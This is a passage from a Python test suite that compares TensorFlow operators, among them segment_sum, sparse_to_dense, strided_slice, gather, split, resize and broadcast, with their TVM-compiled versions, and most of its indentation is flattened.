_test_sparse_segment_variant(tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn)
#######################################################################
# Math SegmentSum
# ------------
def _test_math_segment_sum(data_np, segment_ids_np, use_dyn=False):
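    """ One iteration of math segment_sum """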
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf.math.segment_sum(data, segment_ids, name="segment_sum")
compare_tf_with_tvm(
[data_np, segment_ids_np],
[data.name, segment_ids.name],
["segment_sum:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, segment_ids_np",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 0, 0, 1, 1, 1], dtype=np.int32),
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((6, 4, 5)),
np.array([0, 0, 1, 2, 2, 3], dtype=np.int64),
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float32),
np.array([0, 0, 1], dtype=np.int32),
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 0, 0, 1, 2, 3, 4, 4, 5], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_math_segment_sum(data_np, segment_ids_np, use_dyn):
"""math segment sum test"""
_test_math_segment_sum(data_np, segment_ids_np, use_dyn)
# tensorflow.compat.v1.sparse_to_dense
# ---------------
def _test_sparse_to_dense(sparse_indices, sparse_values, default_value, output_shape):
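    """ One iteration of sparse_to_dense """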
with tf.Graph().as_default():
indices = tf.placeholder(
shape=sparse_indices.shape, dtype=str(sparse_indices.dtype), name="indices"
)
values = tf.placeholder(
shape=sparse_values.shape, dtype=str(sparse_values.dtype), name="values"
)
oshape = tf.constant(output_shape, shape=output_shape.shape, dtype=str(output_shape.dtype))
        if default_value is None:
output = tf.sparse_to_dense(indices, oshape, values)
compare_tf_with_tvm(
[sparse_indices, sparse_values], ["indices:0", "values:0"], output.name
)
else:
dv = tf.placeholder(shape=(), dtype=str(default_value.dtype), name="default_value")
output = tf.sparse_to_dense(indices, oshape, values, dv)
compare_tf_with_tvm(
[sparse_indices, sparse_values, default_value],
["indices:0", "values:0", "default_value:0"],
output.name,
)
def test_forward_sparse_to_dense():
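    """ sparse_to_dense op test"""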
# scalar
_test_sparse_to_dense(
sparse_indices=np.int32(1),
sparse_values=np.int32(3),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3, 3, 3]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([5]).astype("int32"),
)
# vector nXd
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0], [1, 2]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(0),
output_shape=np.array([3, 4]).astype("int32"),
)
_test_sparse_to_dense(
sparse_indices=np.array([[0, 0, 0], [1, 2, 3]]).astype("int32"),
sparse_values=np.array([1, 2]).astype("int32"),
default_value=np.int32(4),
output_shape=np.array([2, 3, 4]).astype("int32"),
)
# floats
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=np.float32(3.5),
output_shape=np.array([5]).astype("int32"),
)
# default value not specified
_test_sparse_to_dense(
sparse_indices=np.array([0, 1, 4]).astype("int32"),
sparse_values=np.array([3.1, 3.1, 3.1]).astype("float32"),
default_value=None,
output_shape=np.array([5]).astype("int32"),
)
#######################################################################
# tensorflow.sparse.to_dense
# ---------------
def _test_sparse_to_dense_v2(indices, values, A_shape, dtype, default_value=None):
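    """ One iteration of tf.sparse.to_dense """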
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
result = tf.sparse.to_dense(A_sp, default_value=default_value)
compare_tf_with_tvm([], [], result.name)
def test_forward_sparse_to_dense_v2():
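    """ sparse.to_dense op test"""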
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32")
_test_sparse_to_dense_v2([[1]], [3.0], [5], "float32", 0.3)
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], "float32", 1.3)
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32")
_test_sparse_to_dense_v2([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], "float32", 1.9)
#######################################################################
# tensorflow.sparse.add
# ----------------------------------
def _test_sparse_add(indices, values, A_shape, B_shape, dtype, flip=False):
""" One iteration of tf.sparse.add """
# TODO(ANSHUMAN87): support cuda
# TODO(ANSHUMAN87): support both sparse input case
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(
indices=indices, values=np.array(values).astype(dtype), dense_shape=A_shape
)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
        # TODO(ANSHUMAN87): support user input threshold values
if flip:
result = tf.sparse.add(B, A_sp, threshold=0)
else:
result = tf.sparse.add(A_sp, B, threshold=0)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name, no_gpu=True)
def test_sparse_add():
""" sparse.add op test"""
###################################################################
#
    # In order to create a SparseTensor, it requires 3 inputs as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
    # The above sparse tensor can be represented in dense form as below:
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
for dtype_inp in ["float32", "float64", "int32"]:
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp)
_test_sparse_add([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [3, 4], dtype_inp, True)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp)
_test_sparse_add([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], dtype_inp, True)
#######################################################################
# StridedSlice
# ------------
def _test_stridedslice(
ip_shape,
begin,
end,
stride,
dtype,
begin_mask=0,
end_mask=0,
new_axis_mask=0,
shrink_axis_mask=0,
ellipsis_mask=0,
):
""" One iteration of a Stridedslice """
tf.reset_default_graph()
np_data = np.random.uniform(size=ip_shape).astype(dtype)
with tf.Graph().as_default():
if len(ip_shape) == 0:
in_data = tf.constant(np_data, dtype)
else:
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.strided_slice(
in_data,
begin,
end,
stride,
begin_mask=begin_mask,
end_mask=end_mask,
new_axis_mask=new_axis_mask,
shrink_axis_mask=shrink_axis_mask,
ellipsis_mask=ellipsis_mask,
name="strided_slice",
)
if len(ip_shape) == 0:
compare_tf_with_tvm(None, "", "strided_slice:0")
else:
compare_tf_with_tvm(np_data, "in_data:0", "strided_slice:0")
def test_forward_stridedslice():
"""test StridedSlice"""
_test_stridedslice([], [0], [0], [1], "float32", new_axis_mask=1)
_test_stridedslice([2], [1], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 1], [0], [1], [1], "float32", shrink_axis_mask=1)
_test_stridedslice([2, 3, 4], [0], [1], [1], "float32", shrink_axis_mask=8)
_test_stridedslice([3, 4, 3], [1, -1, 0], [4, -5, 3], [2, -1, 1], "float32")
_test_stridedslice([3, 4, 3], [1, 0], [4, 3], [2, 1], "float32", ellipsis_mask=8)
_test_stridedslice([3, 4, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0], [4, 2], [2, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 5, 3], [1, 0, 1], [4, 2, 2], [2, 1, 1], "float32", ellipsis_mask=2)
_test_stridedslice([3, 4, 3], [1, 1, 0], [4, 4, 2], [2, 1, 1], "float32", new_axis_mask=5)
_test_stridedslice(
[3, 4, 3], [1, 1, 1], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=4
)
_test_stridedslice(
[6, 4, 5], [1, 1, 1], [6, 3, 4], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=5
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=4, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 1], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=3
)
_test_stridedslice(
[3, 4, 3], [1, 1, 2], [4, 4, 3], [2, 1, 1], "float32", ellipsis_mask=2, new_axis_mask=2
)
_test_stridedslice((3, 4), [1, 0], [4, 4], [1, 1], "float32", shrink_axis_mask=2)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=1, new_axis_mask=2
)
_test_stridedslice(
[3, 4, 3], [1, 1, 0], [4, 4, 3], [2, 1, 1], "float32", shrink_axis_mask=2, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6], [0, 0], [2, 3], [1, 1], "float32", shrink_axis_mask=5, new_axis_mask=1
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=5,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=8,
end_mask=8,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[0, 0, 1, 2, 1],
[2, 3, 4, 5, 3],
[1, 1, 2, 2, 1],
"float32",
shrink_axis_mask=16,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=5,
)
_test_stridedslice(
[3, 4, 5, 4, 5, 6],
[1, 2, 0, -3],
[4, 5, 3, 3],
[2, 2, 1, 1],
"float32",
shrink_axis_mask=8,
new_axis_mask=1,
ellipsis_mask=2,
begin_mask=5,
end_mask=8,
)
_test_stridedslice(
[1, 13, 13, 3, 2],
[0, 0],
[1, 1],
[1, -1],
"float32",
ellipsis_mask=1,
begin_mask=2,
end_mask=2,
)
#######################################################################
# FloorDiv, RealDiv
# -----------------
def _test_forward_divide(ip_shape, dtype):
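    """ One iteration of RealDiv """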
np_numer = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_denomin = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
denominator = tf.placeholder(dtype, ip_shape, name="denomin")
tf.math.divide(numerator, denominator, name="RealDiv")
compare_tf_with_tvm([np_numer, np_denomin], ["numer:0", "denomin:0"], "RealDiv:0")
def _test_forward_floordiv(ip_shape, dtype):
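    """ One iteration of FloorDiv """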
np_numer = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, ip_shape, name="numer")
tf.math.floordiv(numerator, tf.constant(5, dtype=dtype), name="FloorDiv")
compare_tf_with_tvm([np_numer], ["numer:0"], "FloorDiv:0")
def test_forward_divide():
"""test FloorDiv, RealDiv"""
_test_forward_divide((4,), "int32")
_test_forward_divide((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "float32")
_test_forward_floordiv((4, 3, 7), "int32")
#######################################################################
# FloorMod
# --------
def _test_forward_floormod(in_shape, if_shape, dtype):
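    """ One iteration of FloorMod """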
np_numer = np.random.uniform(1, 100, size=in_shape).astype(dtype)
np_factor = np.random.uniform(1, 100, size=if_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
numerator = tf.placeholder(dtype, in_shape, name="numer")
factor = tf.placeholder(dtype, if_shape, name="factor")
tf.floormod(numerator, factor, name="FloorMod")
compare_tf_with_tvm([np_numer, np_factor], ["numer:0", "factor:0"], "FloorMod:0")
def test_forward_floormod():
"""test FloorMod"""
_test_forward_floormod((10,), (10,), "float32")
_test_forward_floormod((8, 2), (1,), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "float32")
_test_forward_floormod((4, 3, 7), (4, 3, 7), "int32")
#######################################################################
# TruncateMod
# -----------
def _test_forward_truncatemod(ip_shape, dtype):
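    """ One iteration of TruncateMod """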
np_data_1 = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
np_data_2 = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data_1 = tf.placeholder(dtype, ip_shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, ip_shape, name="in_data_2")
tf.truncatemod(in_data_1, in_data_2, name="truncatemod")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "truncatemod:0")
def test_forward_truncatemod():
"""test TruncateMod"""
_test_forward_truncatemod((4, 3, 7), "int32")
#######################################################################
# Gather, GatherV2
# --------------------------
def _test_gather(ip_shape, indice_shape, indice_value, axis, batch_dims, dtype):
""" One iteration of a GatherV2 """
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
indices = tf.placeholder("int32", indice_shape, name="indices")
out = tf.gather(in_data, indices, axis=axis, batch_dims=batch_dims)
np_data = np.random.uniform(1, 10, size=ip_shape).astype(dtype)
def _fill_indices(indice_value):
indices = np.array(ip_shape, dtype=dtype)
if isinstance(indice_value, int):
indices = np.array([indice_value], dtype="int32")
else:
indices = np.asarray(indice_value, dtype="int32")
return indices
np_indices = _fill_indices(indice_value)
compare_tf_with_tvm([np_data, np_indices], ["in_data:0", "indices:0"], out.name)
def test_forward_gather():
"""test Gather/GatherV2 layer"""
_test_gather((4,), (1,), 1, 0, 1, "int32")
_test_gather((4,), (1,), 1, 0, 0, "float32")
_test_gather((1, 4), (1,), [0], 0, 0, "int32")
_test_gather((4,), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 1, 0, "int32")
_test_gather((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, 0, "float32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 0, 0, "int32")
_test_gather((3, 3, 3), (1, 1, 2), [[[1, 0]]], 2, 0, "int32")
_test_gather((4, 3, 5, 6), (1, 4), [[2, 1, 0, 0]], 0, 0, "float32")
_test_gather((2, 2), (2, 2), [[0, 0], [0, 0]], 1, 1, "float32")
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 2, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 1, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 2, "float32"
)
_test_gather(
(2, 2, 3, 6), (2, 2, 3), [[[1, 1, 0], [0, 0, 1]], [[0, 1, 0], [1, 0, 1]]], 3, 0, "float32"
)
#######################################################################
# GatherND
# --------------------------
def _test_gather_nd(ip_shape, indice_value, dtype):
"""test operator GatherNd"""
np_data = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.gather_nd(in_data, indices=indice_value, name="gather_nd")
compare_tf_with_tvm([np_data], ["in_data:0"], "gather_nd:0")
def test_forward_gather_nd():
"""test operator GatherNd"""
_test_gather_nd((2, 2), [[0, 0], [1, 1]], "float32")
_test_gather_nd((2, 2, 2), [[1, 0, 0], [0, 0, 0]], "float32")
_test_gather_nd((4,), [1], "float32")
_test_gather_nd((4,), [1], "int32")
_test_gather_nd((1, 4), [0, 3], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "int32")
_test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "float32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
_test_gather_nd((4, 3, 5, 6), [[2, 1, 0, 0]], "float32")
_test_gather_nd((3, 3, 3), [[[2, 1]]], "int32")
#######################################################################
# BiasAdd
# -------
def test_forward_bias_add():
"""test Op BiasAdd"""
    def check_bias_add(lh_shape, rh_shape, dtype):
        tf.reset_default_graph()
        lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.nn.bias_add(lft_data, rgt_data, name="BiasAdd")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "BiasAdd:0")
check_bias_add((10, 8, 16, 32), (32,), dtype="int32")
check_bias_add((10, 20), (20,), dtype="float32")
#######################################################################
# Split
# -----
def _test_split(in_shape, axis, num_or_size_splits, dtype):
    """ One iteration of a Split """
    np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
num_split = (
len(num_or_size_splits) if isinstance(num_or_size_splits, list) else num_or_size_splits
)
split = tf.split(in_data, num_or_size_splits, axis=axis)
relu = [tf.nn.relu(i) for i in split]
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in relu])
# and now test together with concat
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
splitted = tf.split(in_data, num_or_size_splits, axis=axis)
concat = tf.concat(splitted, axis)
compare_tf_with_tvm([np_data], "in_data:0", concat.name)
def test_forward_split():
"""test split layer"""
# rank 1
_test_split((3,), 0, 1, "float32")
_test_split((3,), 0, 3, "float32")
_test_split((6,), 0, 3, "float32")
# rank 2
_test_split((6, 2), 0, 3, "float32")
_test_split((2, 6), 1, 6, "float32")
# rank 3
_test_split((6, 2, 4), 0, 2, "int32")
_test_split((2, 6, 4), 1, 3, "float32")
_test_split((2, 4, 6), 2, 1, "float32")
# rank 4
_test_split((6, 1, 3, 5), 0, 3, "float32")
_test_split((1, 6, 3, 5), 1, 3, "float32")
_test_split((1, 3, 6, 5), 2, 3, "float32")
_test_split((1, 3, 5, 6), 3, 3, "float32")
# split along negative axis
_test_split((6, 1, 3, 5), -4, 3, "float32")
_test_split((1, 6, 3, 5), -3, 3, "float32")
_test_split((1, 3, 6, 5), -2, 3, "float32")
_test_split((1, 3, 5, 6), -1, 3, "float32")
# size_splits list
_test_split((6,), 0, [1, 2, 3], "int32")
_test_split((3, 6, 4), -2, [1, 4, 1], "float32")
######################################################################
# TopKV2
# ------
def _test_forward_top_k_v2(in_shape, k):
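    """ One iteration of TopKV2 """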
np_data = np.random.uniform(-100, 100, size=in_shape).astype("float32")
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder("float32", in_shape, name="in_data")
tf.math.top_k(in_data, k, name="TopK")
compare_tf_with_tvm([np_data], ["in_data:0"], "TopK:0")
def test_forward_top_k_v2():
_test_forward_top_k_v2((3,), 1)
_test_forward_top_k_v2((3,), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
_test_forward_top_k_v2((3, 5, 7), 3)
#######################################################################
# Unstack
# -------
def _test_unstack(ip_shape, axis, dtype):
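    """ One iteration of Unstack """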
np_data = np.random.uniform(-5, 5, size=ip_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
unstack = tf.unstack(in_data, axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in unstack])
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.stack(tf.unstack(in_data, axis=axis), axis=axis)
compare_tf_with_tvm([np_data], ["in_data:0"], "stack:0")
def test_forward_unstack():
"""test unstack layer"""
_test_unstack((6,), 0, "int32")
_test_unstack((2, 6), 1, "float64")
# negative axis
_test_unstack((1, 4), -1, "int32")
_test_unstack((3, 6, 4), -2, "float32")
#######################################################################
# Tile
# ----
def _test_tile(in_shape, multiples, dtype):
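    """ One iteration of Tile """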
np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.tile(in_data, multiples=multiples, name="tile")
compare_tf_with_tvm([np_data], ["in_data:0"], "tile:0")
def test_forward_tile():
"""test Tile"""
_test_tile((2,), (3,), "int32")
_test_tile((2, 2), (2, 3), "float32")
_test_tile((2, 4, 6), (6, 7, 8), "float64")
#######################################################################
# ClipByValue
# -----------
def _test_forward_clip_by_value(ip_shape, clip_value_min, clip_value_max, dtype):
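    """ One iteration of ClipByValue """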
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, ip_shape, name="in_data")
tf.clip_by_value(in_data, clip_value_min, clip_value_max, name="ClipByValue")
np_data = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
compare_tf_with_tvm([np_data], ["in_data:0"], "ClipByValue:0")
def test_forward_clip_by_value():
"""test ClipByValue op"""
if tf.__version__ < LooseVersion("1.9"):
_test_forward_clip_by_value((4,), 0.1, 5.0, "float32")
_test_forward_clip_by_value((4, 4), 1, 5, "int32")
#######################################################################
# Multi Input to graph
# --------------------
def test_forward_multi_input():
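    """test multi-input graph"""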
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
out = tf.multiply(out1, out2, name="out")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
compare_tf_with_tvm(
[in_data, in_data, in_data, in_data], ["in1:0", "in2:0", "in3:0", "in4:0"], "out:0"
)
#######################################################################
# Multi Output to Graph
# ---------------------
def test_forward_multi_output():
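    """test multi-output graph"""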
with tf.Graph().as_default():
in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
out1 = tf.add(in1, in2, name="out1")
out2 = tf.subtract(in3, in4, name="out2")
in_data = np.arange(9, dtype="int32").reshape([3, 3])
in_data = [in_data] * 4
in_name = ["in1:0", "in2:0", "in3:0", "in4:0"]
out_name = ["out1:0", "out2:0"]
out_node = [out.strip(":0") for out in out_name]
in_node = [inp.strip(":0") for inp in in_name]
with tf.Session() as sess:
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
tvm_output = run_tvm_graph(
final_graph_def, in_data, in_node, target="llvm", out_names=out_node, num_output=2
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Resize Bilinear, Nearest_Neighbor
# ---------------------------------
def _test_resize_bilinear(in_shape, to_shape, align_corners):
""" One iteration of resize bilinear """
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_bilinear(in_data, shape_data, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_bilinear_from_tensor(in_shape, align_corners):
"""One iteration of resize bilinear with non-constant output shape, requires
value inference to get proper output shape."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], None, None, in_shape[3]], dtype=data.dtype
)
to_shape = tf.shape(in_data)[1:3]
tf.image.resize_bilinear(in_data, to_shape, align_corners=align_corners)
compare_tf_with_tvm(data, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_nearest_neighbor(in_shape, to_shape):
""" One iteration of resize nearest neighbor """
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.image.resize_nearest_neighbor(in_data, shape_data, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def _test_resize_nearest_neighbor_dynamic_shape(in_shape, scale):
""" One iteration of resize nearest neighbor for graph with dynamic input shape """
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=None, dtype=data.dtype)
# multiply input shape by scale factor
new_shape = tf.shape(in_data)[1:3] * tf.constant(scale, dtype=tf.int32)
tf.image.resize_nearest_neighbor(in_data, new_shape, name="resize_nearest_neighbor")
compare_tf_with_tvm(data, "Placeholder:0", "resize_nearest_neighbor:0")
def test_forward_resize():
""" Resize Bilinear, Nearest_Neighbor """
# TF default layout is NHWC
_test_resize_bilinear((4, 32, 32, 3), [50, 50], False)
_test_resize_bilinear((6, 32, 32, 3), [20, 20], True)
_test_resize_bilinear_from_tensor((4, 32, 32, 3), False)
_test_resize_bilinear_from_tensor((6, 50, 50, 3), True)
_test_resize_nearest_neighbor((6, 32, 32, 3), [20, 20])
_test_resize_nearest_neighbor_dynamic_shape((1, 16, 16, 3), scale=[2, 2])
#######################################################################
# BroadcastArgs
# -----------
def _test_broadcast_args(in_shape_1, in_shape_2):
""" One iteration of broadcast_args"""
shape_1 = np.array(in_shape_1).astype("int32")
shape_2 = np.array(in_shape_2).astype("int32")
with tf.Graph().as_default():
shape_1 = constant_op.constant(shape_1, shape=shape_1.shape, dtype=shape_1.dtype)
shape_2 = constant_op.constant(shape_2, shape=shape_2.shape, dtype=shape_2.dtype)
tf.raw_ops.BroadcastArgs(s0=shape_1, s1=shape_2)
compare_tf_with_tvm(None, "", "BroadcastArgs:0", opt_level=0)
def test_forward_broadcast_args():
""" Resize Bilinear """
_test_broadcast_args((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_args((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_args((32, 32, 16), [6, 32, 32, 16])
#######################################################################
# BroadcastTo
# -----------
def _test_broadcast_to(in_shape, to_shape):
""" One iteration of broadcast_to"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0", opt_level=0)
def _test_broadcast_to_from_tensor(in_shape):
""" One iteration of broadcast_to with unknown shape at graph build"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=[None], dtype=data.dtype)
shape_data = tf.multiply(tf.shape(in_data), 32)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0")
def test_forward_broadcast_to():
""" Resize Bilinear """
_test_broadcast_to((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_to((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_to_from_tensor((1))
#######################################################################
# Fill
# ----
def _test_fill(in_shape):
""" Use the fill op to create a tensor of ones with non-constant shape."""
with tf.Graph().as_default():
tf.ones(shape=in_shape, dtype="float32")
compare_tf_with_tvm(in_shape, [], "ones:0", opt_level=1)
def _test_fill_from_tensor(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape.
Some extra ops need to be added here to prevent the graph from
being fully constant and folded away."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], in_shape[1], None, None], dtype=data.dtype
)
x = tf.ones(shape=2 * tf.shape(in_data), dtype=data.dtype)
y = tf.math.add(in_data, tf.reduce_mean(x), name="out1")
